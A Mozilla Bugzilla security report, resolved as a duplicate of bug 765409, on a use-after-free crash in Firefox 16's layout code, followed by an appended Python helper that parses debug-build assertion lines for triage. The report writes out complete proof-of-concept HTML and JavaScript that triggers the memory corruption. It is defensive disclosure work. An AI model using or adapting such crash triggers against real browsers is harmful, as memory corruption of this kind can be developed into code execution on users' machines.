Status

Status: RESOLVED DUPLICATE of bug 765409
Type: defect
Priority: --
Severity: critical
Reported: 7 years ago
Modified: 4 years ago

People

Reporter: abbGZcvu_bugzilla.mozilla.org
Assignee: Unassigned

Tracking

Keywords: crash
Version: 16 Branch
Hardware: x86_64
OS: Windows 7

Attachments

1 attachment: repro.zip (551 bytes, application/octet-stream)
Reporter

Description

7 years ago
Posted file repro.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4

Steps to reproduce:

The below files trigger a use-after-free in Firefox 16.0.1, causing it to crash when it tries to access data through a poisoned frame. frame.html can trigger the issue by itself, and repro.html is not required but does make it easier to trigger the access violation.

--- repro.html ---
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
    <iframe src="frame.html"></iframe>
  </body>
</html>

--- frame.html ---
<!DOCTYPE html>
<fieldset><x dir="rtl">
<script id="y" type="text/javascript">
  // Detach the running script element from the document before writing new markup
  var oScriptElement = document.getElementById("y");
  oScriptElement.parentNode.removeChild(oScriptElement);
  // Deliberately unclosed markup nested inside the dir="rtl" ancestor above,
  // ending in an element that switches direction back to ltr
  var oHtml = '<x>' +
                '<x id="x"></x>' +
                ' ' +
                '<img alt="AAAAAAAAAAAAAAAAAAAAAA c">' +
                '<x>' +
                  ' ' +
                  '<x dir="ltr">';
  document.write(oHtml);
  // Reading offsetTop forces a synchronous layout flush, so frames are built for the new content
  document.documentElement.offsetTop;
  // Changing the text content forces a second reflow; this is where the crash in
  // nsLineLayout::ReflowFrame (see "Actual results") occurs
  var oElement = document.getElementById("x");
  oElement.textContent = 'x';
</script>



Actual results:

Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame


Expected results:

No crash
Component: Untriaged → Layout
Product: Firefox → Core

Comment 1

7 years ago
I can reproduce the crash in mozilla-beta and -release debug builds on Linux64,
but not -aurora or trunk.  Before the crash I got these assertions:

###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339

which points to bug 765409.  After applying the patch there, the crash
and assertions are gone.  (The fix will land on -beta (Fx17) soon)
Severity: normal → critical
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Duplicate of bug: 765409
Group: core-security
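Triage helper for the assertion output quoted in Comment 1, added here as an example that is not part of the bug report or of Mozilla's own tooling: it parses Gecko `###!!! ASSERTION:` lines into (message, condition, file, line) records and checks whether a log contains the full set of assertion sites that Comment 1 matched to bug 765409. The signature table and the sample log are constructed from the lines quoted above; the filler line and the function names are assumptions of this example.

```python
import re
from dataclasses import dataclass
# Gecko debug-build assertion line: "###!!! ASSERTION: <msg>: '<cond>', file <path>, line <n>".
# The message may contain colons and apostrophes ("can't find aChild"), so the
# condition is anchored on the trailing ", file ..., line N" rather than on the first colon.
ASSERTION_RE = re.compile(
    r"^###!!! ASSERTION: (?P<message>.*): '(?P<condition>[^']*)', "
    r"file (?P<file>\S+), line (?P<line>\d+)\s*$"
)

@dataclass(frozen=True)
class Assertion:
    message: str
    condition: str
    file: str
    line: int
    def site(self) -> str:
        """file:line, the part that stays stable across builds of one source tree."""
        return f"{self.file}:{self.line}"

def parse_assertions(log_text: str) -> list[Assertion]:
    """Extract every assertion line from a debug-build log, in order."""
    found = []
    for raw in log_text.splitlines():
        m = ASSERTION_RE.match(raw)
        if m:
            found.append(Assertion(m["message"], m["condition"], m["file"], int(m["line"])))
    return found

# Known signature: the three assertion sites Comment 1 matched to bug 765409.
KNOWN_SIGNATURES = {
    765409: {
        "layout/generic/nsInlineFrame.cpp:500",
        "layout/generic/nsContainerFrame.cpp:1210",
        "layout/generic/nsContainerFrame.cpp:1339",
    },
}

def likely_duplicates(assertions: list[Assertion]) -> list[int]:
    """Bug ids whose known assertion sites all appear in the observed log."""
    seen = {a.site() for a in assertions}
    return [bug for bug, sites in KNOWN_SIGNATURES.items() if sites <= seen]

# Constructed sample log: the three lines quoted in Comment 1 plus one filler line.
SAMPLE_LOG = """\
WARNING: constructed filler line that is not an assertion
###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339
"""
```

Matching on file:line rather than on the full message text keeps the check robust to small wording changes between builds, at the cost of needing a new entry whenever the source file is edited above the assertion.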